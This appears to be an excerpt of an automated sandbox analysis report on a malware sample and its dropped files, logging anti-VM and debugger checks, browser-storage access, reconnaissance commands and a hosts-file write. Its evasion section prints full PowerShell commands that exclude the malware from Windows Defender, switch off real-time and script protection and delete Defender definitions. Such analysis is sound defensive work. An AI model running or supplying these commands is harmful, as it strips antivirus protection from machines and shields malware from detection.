                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Brokercrt\comReviewsession.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\it-IT\dasHost.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\it-IT\dasHost.exeThread delayed: delay time: 922337203685477
                        Source: C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exeThread delayed: delay time: 922337203685477
                        Source: C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exeThread delayed: delay time: 922337203685477
                        Source: C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code CacheJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\CacheJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\extJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefpJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\jsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\defJump to behavior
                        Source: Built.exe, 00000003.00000002.2043351840.000001D5E4E50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWems,%SystemRoot%\system32\mswsock.dllds of the socket object.
                        Source: Built.exe, 00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxtray
                        Source: Built.exe, 00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxservice
                        Source: Built.exe, 00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: qemu-ga
                        Source: Built.exe, 00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmware
                        Source: comReviewsession.exe, 00000026.00000002.1916487739.000000001C50D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}d8HvYJOq9YxQzTMJIcOmRJHMACSHA1HKISFgTYJMKjSSblskpPFhiSX9mp8UYHPSulBGGiWqHS2ZCmYXppHSPY4VhT838vVbg249oLASx2w6M73XO7OVnnA2624CtGJaJMbhc58EeI8dWk3O8bLTXvmciEclW0vHRWZhHVkivqc1SS0up4xS4Q5FVmLpScmUmCMOhkHdLOY7323IcTWieW
                        Source: Built.exe, 00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareuser
                        Source: Built.exe, 00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmusrvc
                        Source: comReviewsession.exe, 00000026.00000002.1917145309.000000001C57A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b8b}
                        Source: svchosts.exe, 00000002.00000003.1707345062.00000000031F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}d-
                        Source: wscript.exe, 00000005.00000002.1807041787.0000000002AB6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                        Source: XClient.exe, 00000006.00000002.2837735994.000000001C2B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: Built.exe, 00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmsrvc
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1754382255.0000000000B73000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll(
                        Source: Built.exe, 00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmtoolsd
                        Source: comReviewsession.exe, 00000026.00000000.1806567735.0000000000EC2000.00000002.00000001.01000000.00000022.sdmpBinary or memory string: bLTXvmciEclW0vHRWZh
                        Source: Built.exe, 00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwaretray
                        Source: Built.exe, 00000003.00000003.1891900310.000001D5E542F000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1928015853.000001D5E629F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
                        Source: Built.exe, 00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareservice
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeAPI call chain: ExitProcess graph end nodegraph_2-24466
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess information queried: ProcessInformation
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess queried: DebugPort
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess queried: DebugPort
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 1_2_00007FF76D5D9924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF76D5D9924
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeCode function: 2_2_002B753D mov eax, dword ptr fs:[00000030h]2_2_002B753D
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 1_2_00007FF76D5E2790 GetProcessHeap,1_2_00007FF76D5E2790
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Brokercrt\comReviewsession.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\SysWOW64\it-IT\dasHost.exeProcess token adjusted: Debug
                        Source: C:\Windows\SysWOW64\it-IT\dasHost.exeProcess token adjusted: Debug
                        Source: C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exeProcess token adjusted: Debug
                        Source: C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exeProcess token adjusted: Debug
                        Source: C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 1_2_00007FF76D5CC62C SetUnhandledExceptionFilter,1_2_00007FF76D5CC62C
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 1_2_00007FF76D5D9924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF76D5D9924
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 1_2_00007FF76D5CC44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF76D5CC44C
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 1_2_00007FF76D5CBBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FF76D5CBBC0
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeCode function: 2_2_002AF063 SetUnhandledExceptionFilter,2_2_002AF063
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeCode function: 2_2_002AF22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_002AF22B
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeCode function: 2_2_002B866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_002B866F
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeCode function: 2_2_002AEF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_002AEF05
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FF76D5CC62C SetUnhandledExceptionFilter,3_2_00007FF76D5CC62C
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FF76D5D9924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00007FF76D5D9924
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FF76D5CC44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00007FF76D5CC44C
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FF76D5CBBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00007FF76D5CBBC0
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeMemory allocated: page read and write | page guard

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe'
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'"Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'"Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'"Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe'
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                        Source: C:\Users\user\Desktop\Vjy8d2EoqK.exeProcess created: C:\Users\user\AppData\Local\Temp\Built.exe "C:\Users\user\AppData\Local\Temp\Built.exe" Jump to behavior
                        Source: C:\Users\user\Desktop\Vjy8d2EoqK.exeProcess created: C:\Users\user\AppData\Local\Temp\svchosts.exe "C:\Users\user\AppData\Local\Temp\svchosts.exe" Jump to behavior
                        Source: C:\Users\user\Desktop\Vjy8d2EoqK.exeProcess created: C:\Users\user\AppData\Local\Temp\S l r .exe "C:\Users\user\AppData\Local\Temp\S l r .exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Users\user\AppData\Local\Temp\Built.exe "C:\Users\user\AppData\Local\Temp\Built.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Brokercrt\aIVfHknoFLGNu6gLK6xZar0.vbe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: unknown unknownJump to behavior
